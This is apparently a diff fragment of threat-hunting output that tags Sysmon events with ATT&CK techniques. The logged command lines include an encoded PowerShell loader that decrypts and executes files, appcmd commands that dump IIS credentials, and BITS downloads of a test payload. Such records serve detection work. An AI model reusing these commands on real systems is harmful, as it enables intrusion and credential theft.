+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-11 17:28:22.488</Data>
+    <Data Name=""ProcessGuid"">365ABB72-0636-5CD7-0000-0010A6C72100</Data>
+    <Data Name=""ProcessId"">544</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">c:\windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-F9CD-5CD6-0000-00201B370100</Data>
+    <Data Name=""LogonId"">0x1371b</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-0545-5CD7-0000-001078371F00</Data>
+    <Data Name=""ParentProcessId"">3044</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;. )&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:20.435250Z"">
+    </TimeCreated>
+    <EventRecordID>5988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:20.375</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-001032EAFF00</Data>
+    <Data Name=""ProcessId"">1004</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;. )&quot; /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:03.254713Z"">
+    </TimeCreated>
+    <EventRecordID>4893</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:03.238</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
+    <Data Name=""ProcessId"">2948</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:03.254713Z"">
+    </TimeCreated>
+    <EventRecordID>4893</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:03.238</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
+    <Data Name=""ProcessId"">2948</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:20.305063Z"">
+    </TimeCreated>
+    <EventRecordID>5985</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:20.265</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-001072E6FF00</Data>
+    <Data Name=""ProcessId"">2640</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c bitsadmin.exe /transfer &quot;JobName&quot; https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt &quot;C:\Windows\system32\Default_File_Path.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:03.193387Z"">
+    </TimeCreated>
+    <EventRecordID>4892</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:03.184</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00109B328600</Data>
+    <Data Name=""ProcessId"">6020</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c bitsadmin.exe /transfer &quot;JobName&quot; https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt &quot;C:\Windows\system32\Default_File_Path.ps1&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T17:41:08.967692Z"">
+    </TimeCreated>
+    <EventRecordID>1966184</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1168"" ThreadID=""604"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 17:41:08.947</Data>
+    <Data Name=""ProcessGuid"">365ABB72-29B4-5C91-0000-0010289AC308</Data>
+    <Data Name=""ProcessId"">3748</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.EXE /c malwr.vbs</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">EXAMPLE\user01</Data>
+    <Data Name=""LogonGuid"">365ABB72-2209-5C91-0000-0020FA479E03</Data>
+    <Data Name=""LogonId"">0x39e47fa</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-1A4A-5C91-0000-0010455A0000</Data>
+    <Data Name=""ParentProcessId"">512</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
